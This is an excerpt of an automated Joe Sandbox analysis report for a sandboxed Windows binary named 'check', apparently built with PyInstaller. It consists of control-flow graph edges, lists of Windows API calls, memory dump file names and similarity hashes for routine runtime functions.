983->980 987->940 993 7ff60b13bda7-7ff60b13bdaf 989->993 994 7ff60b13bd82-7ff60b13bd9b call 7ff60b13b674 989->994 998 7ff60b13be2b-7ff60b13be38 call 7ff60b13b4b4 993->998 999 7ff60b13bdb1-7ff60b13bdc3 993->999 1001 7ff60b13bda0-7ff60b13bda2 994->1001 998->1001 1002 7ff60b13be1e-7ff60b13be26 999->1002 1003 7ff60b13bdc5 999->1003 1001->975 1002->975 1005 7ff60b13bdca-7ff60b13bdd1 1003->1005 1006 7ff60b13be0d-7ff60b13be18 1005->1006 1007 7ff60b13bdd3-7ff60b13bdd7 1005->1007 1006->1002 1008 7ff60b13bdd9-7ff60b13bde0 1007->1008 1009 7ff60b13bdf3 1007->1009 1008->1009 1010 7ff60b13bde2-7ff60b13bde6 1008->1010 1011 7ff60b13bdf9-7ff60b13be09 1009->1011 1010->1009 1012 7ff60b13bde8-7ff60b13bdf1 1010->1012 1011->1005 1013 7ff60b13be0b 1011->1013 1012->1011 1013->1002
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                • Instruction ID: d87c90136839e926facbae397fbc7e4c083bd2c273166a1861d736ae6922bc74
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BC1E122A0C68681E6609B1594402BE3B54FB89F98F7981B1EA4FC37B5FF7DE8458740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                • Instruction ID: 414ad766c3ca4aa11a1b727ac41343f9e02650e945a691ab76caf13d7f299d90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7213731A0C64242EB509B55F54423AA3A4FFCABA8F648275E66EC37F4DF7CD8558700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128570: GetCurrentProcess.KERNEL32 ref: 00007FF60B128590
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128570: OpenProcessToken.ADVAPI32 ref: 00007FF60B1285A3
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128570: GetTokenInformation.KERNELBASE ref: 00007FF60B1285C8
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128570: GetLastError.KERNEL32 ref: 00007FF60B1285D2
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128570: GetTokenInformation.KERNELBASE ref: 00007FF60B128612
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF60B12862E
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128570: CloseHandle.KERNEL32 ref: 00007FF60B128646
                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF60B123C55), ref: 00007FF60B12916C
                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF60B123C55), ref: 00007FF60B129175
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                • Instruction ID: 5b91131f71871560f91e1b9bbe2ade76b6907e9e0bc47ce96795a261ece3dde7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15215121A0874281FB10AB11E5153EA6261FF8E788F648075EA4FD37A6DF3CDD158780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?,00007FF60B12352C,?,00000000,00007FF60B123F23), ref: 00007FF60B127F32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                • Instruction ID: e9fc322b9bf66fd5673e2d24359453a8b6ba8a89434a5cbf6eedffb4499119cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1731C521719AC145EB218B21F4107AB6254EF89BE8F608270EE6EC77E9DF2CDE118700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60B13CF4B), ref: 00007FF60B13D07C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60B13CF4B), ref: 00007FF60B13D107
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                • Instruction ID: fef740002d38aadb6c8062a721000ed561d45823059780ad1461ef520c93331c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14919272F1865195F7609F65A4402BD2BA4EB48F8CF6481B9DE0FE7AA5EF38D442C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                • Instruction ID: 3b86e67c0c99e1dd0f8870cee9d4ebdfdc12fc8f396f23f1e1dd22da5dfbc482
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A51F3B2F042118AEB14CF6499616BC2761AF5876DF248275DD1FD2AF9EF3CA4078700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                • Instruction ID: a7374a7e51c5862be3a01630a9f4c6b25cf218fc18f826c12732b580b1626320
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4514822E086418AFB10CF7294503BD37A6AB58F9CF348575DE0ADB6A9EF38D4518740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                • Instruction ID: 6d6d322bebb057840c5c73f79c527b160407f68bfbf9b15734721d2f5672a8c0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46419562D2878183E7508B2095103797361FBA9BA8F20D375E65EC3AE5EF7CA5E08700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                • Instruction ID: c56c74d85aff2acbc074982f6cea31dd11975b0f34c23d6eb3fe973c71c913ec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C312821E0C14741FA24AB65E4123BD2681DF4A78CF64D4B5DA0FCB2F7DE6DAC248281
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                • Instruction ID: 19b86e81fdbafab7d74c0acf3eef3bd450a263f936d1a9ff99db3a0b2b4ccf3a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09D09210B0C70682EB182B716C9917A32556F8DF8DF34A9B8C84BC63B3EE6CE8494340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                • Instruction ID: 87776c4263f3e764c2b79056b40d793a0c82d6552423447f06667bb5366c77c5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B951C461B0924186F7689A25940877A66D1AF4CFACF28C674DD6EC77E5EF3CE5018600
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                • Instruction ID: 47e60541e81210fce3ff795e380b23155e2cbc4f3b74d81265a6435ab31eef40
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF11BF62608B81C1DA208B25A854169B361EB49FF8F648371EE7ECB7E9DF7CD0118740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60B135839), ref: 00007FF60B135957
                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60B135839), ref: 00007FF60B13596D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                • Instruction ID: f494b54f770ddb2665dcd010b5599fc264fb9c54bf26b61e554b9b17e5034ffa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63118F6260C64282EA548B15A42113BB761EB99F79F604276F69BC19E8FF2CD414DB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF60B142D22,?,?,?,00007FF60B142D5F,?,?,00000000,00007FF60B143225,?,?,?,00007FF60B143157), ref: 00007FF60B13A95E
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF60B142D22,?,?,?,00007FF60B142D5F,?,?,00000000,00007FF60B143225,?,?,?,00007FF60B143157), ref: 00007FF60B13A968
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                • Instruction ID: 05ccac3bf50c7cadbebd79da0a1184588f0ccb684324a8308f029903a5786529
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33E08C10F1D20282FF196BF2A89513D26646F8CF08F64C0B4C81FD23B1FE2CA9828310
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF60B13A9D5,?,?,00000000,00007FF60B13AA8A), ref: 00007FF60B13ABC6
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF60B13A9D5,?,?,00000000,00007FF60B13AA8A), ref: 00007FF60B13ABD0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
